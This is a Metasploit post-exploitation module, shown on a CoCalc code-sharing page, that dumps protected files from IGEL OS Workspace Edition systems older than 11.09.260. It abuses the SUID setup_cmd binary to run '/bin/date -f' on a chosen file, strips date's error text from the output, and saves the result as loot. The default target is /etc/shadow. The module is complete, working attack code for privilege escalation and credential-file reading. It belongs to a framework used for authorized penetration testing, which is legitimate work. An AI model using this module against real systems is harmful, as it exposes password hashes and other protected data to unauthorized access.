Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/linux/gather/igel_dump_file.rb
27907 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'IGEL OS Dump File',

14
        'Description' => %q{

15
          Dump a file with escalated privileges for IGEL OS Workspace Edition sessions,

16
          by elevating rights with setup_cmd (SUID) and outputting with date.

17
        },

18
        'Author' => 'Zack Didcott',

19
        'License' => MSF_LICENSE,

20
        'Platform' => ['linux'],

21
        'SessionTypes' => ['shell', 'meterpreter'],

22
        'DisclosureDate' => '2024-03-07', # Patch release date

23
        'Notes' => {

24
          'Stability' => [CRASH_SAFE],

25
          'Reliability' => [REPEATABLE_SESSION],

26
          'SideEffects' => []

27
        }

28
      )

29
    )

30


31
    register_options([

32
      OptString.new('RPATH', [true, 'File on the target to dump', '/etc/shadow'])

33
    ])

34
  end

35


36
  def check

37
    version = Rex::Version.new(

38
      read_file('/etc/system-release').delete_prefix('IGEL OS').strip

39
    )

40
    unless version < Rex::Version.new('11.09.260')

41
      return Exploit::CheckCode::Safe("IGEL OS #{version} is not vulnerable")

42
    end

43


44
    unless file?('/etc/setupd-usercommands.json')

45
      return Exploit::CheckCode::Appears("IGEL OS #{version} appears to be vulnerable")

46
    end

47


48
    Exploit::CheckCode::Appears("IGEL OS #{version} should be vulnerable")

49
  end

50


51
  def run

52
    unless [

53
      Exploit::CheckCode::Detected,

54
      Exploit::CheckCode::Appears,

55
      Exploit::CheckCode::Vulnerable

56
    ].include?(check)

57
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')

58
    end

59


60
    print_status('Executing command on target')

61
    output = create_process('/config/bin/setup_cmd', args: ['/bin/date', '-f', datastore['RPATH']])

62


63
    print_status('Command completed:')

64
    data = []

65
    output.lines[1..].each do |line|

66
      line = line.strip.delete_prefix(

67
        '/bin/date: invalid date ‘'

68
      ).delete_suffix('’')

69
      data << line

70
      print_line(line)

71
    end

72


73
    fname = File.basename(datastore['RPATH'].downcase)

74
    loot = store_loot("igel.#{fname}", 'text/plain', session, data.join("\n"), datastore['RPATH'])

75
    print_status("#{datastore['RPATH']} stored in #{loot}")

76
  end

77
end

78


79